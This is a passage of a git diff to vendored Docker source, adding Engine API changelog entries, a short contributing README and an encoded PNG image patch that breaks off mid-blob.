+* `GET /distribution/(name)/json` is a new endpoint that returns a JSON output stream with payload `types.DistributionInspect` for an image name. It includes a descriptor with the digest, and supported platforms retrieved from directly contacting the registry.
+* `POST /swarm/update` now accepts 3 additional parameters as part of the swarm spec's CA configuration; the desired CA certificate for
+ the swarm, the desired CA key for the swarm (if not using an external certificate), and an optional parameter to force swarm to
+ generate and rotate to a new CA certificate/key pair.
+* `POST /service/create` and `POST /services/(id or name)/update` now take the field `Platforms` as part of the service `Placement`, allowing to specify platforms supported by the service.
+* `POST /containers/(name)/wait` now accepts a `condition` query parameter to indicate which state change condition to wait for. Also, response headers are now returned immediately to acknowledge that the server has registered a wait callback for the client.
+* `POST /swarm/init` now accepts a `DataPathAddr` property to set the IP-address or network interface to use for data traffic
+* `POST /swarm/join` now accepts a `DataPathAddr` property to set the IP-address or network interface to use for data traffic
+* `GET /events` now supports service, node and secret events which are emitted when users create, update and remove service, node and secret
+* `GET /events` now supports network remove event which is emitted when users remove a swarm scoped network
+* `GET /events` now supports a filter type `scope` in which supported value could be swarm and local
+
+## v1.29 API changes
+
+[Docker Engine API v1.29](https://docs.docker.com/engine/api/v1.29/) documentation
+
+* `DELETE /networks/(name)` now allows to remove the ingress network, the one used to provide the routing-mesh.
+* `POST /networks/create` now supports creating the ingress network, by specifying an `Ingress` boolean field. As of now this is supported only when using the overlay network driver.
+* `GET /networks/(name)` now returns an `Ingress` field showing whether the network is the ingress one.
+* `GET /networks/` now supports a `scope` filter to filter networks based on the network mode (`swarm`, `global`, or `local`).
+* `POST /containers/create`, `POST /service/create` and `POST /services/(id or name)/update` now takes the field `StartPeriod` as a part of the `HealthConfig` allowing for specification of a period during which the container should not be considered unhealthy even if health checks do not pass.
+* `GET /services/(id)` now accepts an `insertDefaults` query-parameter to merge default values into the service inspect output.
+* `POST /containers/prune`, `POST /images/prune`, `POST /volumes/prune`, and `POST /networks/prune` now support a `label` filter to filter containers, images, volumes, or networks based on the label. The format of the label filter could be `label=<key>`/`label=<key>=<value>` to remove those with the specified labels, or `label!=<key>`/`label!=<key>=<value>` to remove those without the specified labels.
+* `POST /services/create` now accepts `Privileges` as part of `ContainerSpec`. Privileges currently include
+  `CredentialSpec` and `SELinuxContext`.
+
+## v1.28 API changes
+
+[Docker Engine API v1.28](https://docs.docker.com/engine/api/v1.28/) documentation
+
+* `POST /containers/create` now includes a `Consistency` field to specify the consistency level for each `Mount`, with possible values `default`, `consistent`, `cached`, or `delegated`.
+* `GET /containers/create` now takes a `DeviceCgroupRules` field in `HostConfig` allowing to set custom device cgroup rules for the created container.
+* Optional query parameter `verbose` for `GET /networks/(id or name)` will now list all services with all the tasks, including the non-local tasks on the given network.
+* `GET /containers/(id or name)/attach/ws` now returns WebSocket in binary frame format for API version >= v1.28, and returns WebSocket in text frame format for API version< v1.28, for the purpose of backward-compatibility.
+* `GET /networks` is optimised only to return list of all networks and network specific information. List of all containers attached to a specific network is removed from this API and is only available using the network specific `GET /networks/{network-id}.
+* `GET /containers/json` now supports `publish` and `expose` filters to filter containers that expose or publish certain ports.
+* `POST /services/create` and `POST /services/(id or name)/update` now accept the `ReadOnly` parameter, which mounts the container's root filesystem as read only.
+* `POST /build` now accepts `extrahosts` parameter to specify a host to ip mapping to use during the build.
+* `POST /services/create` and `POST /services/(id or name)/update` now accept a `rollback` value for `FailureAction`.
+* `POST /services/create` and `POST /services/(id or name)/update` now accept an optional `RollbackConfig` object which specifies rollback options.
+* `GET /services` now supports a `mode` filter to filter services based on the service mode (either `global` or `replicated`).
+* `POST /containers/(name)/update` now supports updating `NanoCPUs` that represents CPU quota in units of 10<sup>-9</sup> CPUs.
+
+## v1.27 API changes
+
+[Docker Engine API v1.27](https://docs.docker.com/engine/api/v1.27/) documentation
+
+* `GET /containers/(id or name)/stats` now includes an `online_cpus` field in both `precpu_stats` and `cpu_stats`. If this field is `nil` then for compatibility with older daemons the length of the corresponding `cpu_usage.percpu_usage` array should be used.
+
 ## v1.26 API changes
 
 [Docker Engine API v1.26](https://docs.docker.com/engine/api/v1.26/) documentation
@@ -83,6 +253,11 @@ keywords: "API, Docker, rcli, REST, documentation"
 * `DELETE /secrets/{id}` removes the secret `id`.
 * `GET /secrets/{id}` returns information on the secret `id`.
 * `POST /secrets/{id}/update` updates the secret `id`.
+* `POST /services/(id or name)/update` now accepts service name or prefix of service id as a parameter.
+* `POST /containers/create` added 2 built-in log-opts that work on all logging drivers,
+  `mode` (`blocking`|`non-blocking`), and `max-buffer-size` (e.g. `2m`) which enables a non-blocking log buffer.
+* `POST /containers/create` now takes `HostConfig.Init` field to run an init
+  inside the container that forwards signals and reaps processes.
 
 ## v1.24 API changes
 
diff --git a/vendor/github.com/docker/docker/docs/contributing/README.md b/vendor/github.com/docker/docker/docs/contributing/README.md
new file mode 100644
index 0000000000..915c0cff1e
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/contributing/README.md
@@ -0,0 +1,8 @@
+### Get set up for Moby development
+
+ * [README first](who-written-for.md)
+ * [Get the required software](software-required.md)
+ * [Set up for development on Windows](software-req-win.md)
+ * [Configure Git for contributing](set-up-git.md)
+ * [Work with a development container](set-up-dev-env.md)
+ * [Run tests and test documentation](test.md)
diff --git a/vendor/github.com/docker/docker/docs/contributing/images/branch-sig.png b/vendor/github.com/docker/docker/docs/contributing/images/branch-sig.png
new file mode 100644
index 0000000000000000000000000000000000000000..b069319eeeb7efa7c3f00b5b9d080ce83ffc6654
GIT binary patch
literal 56537
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
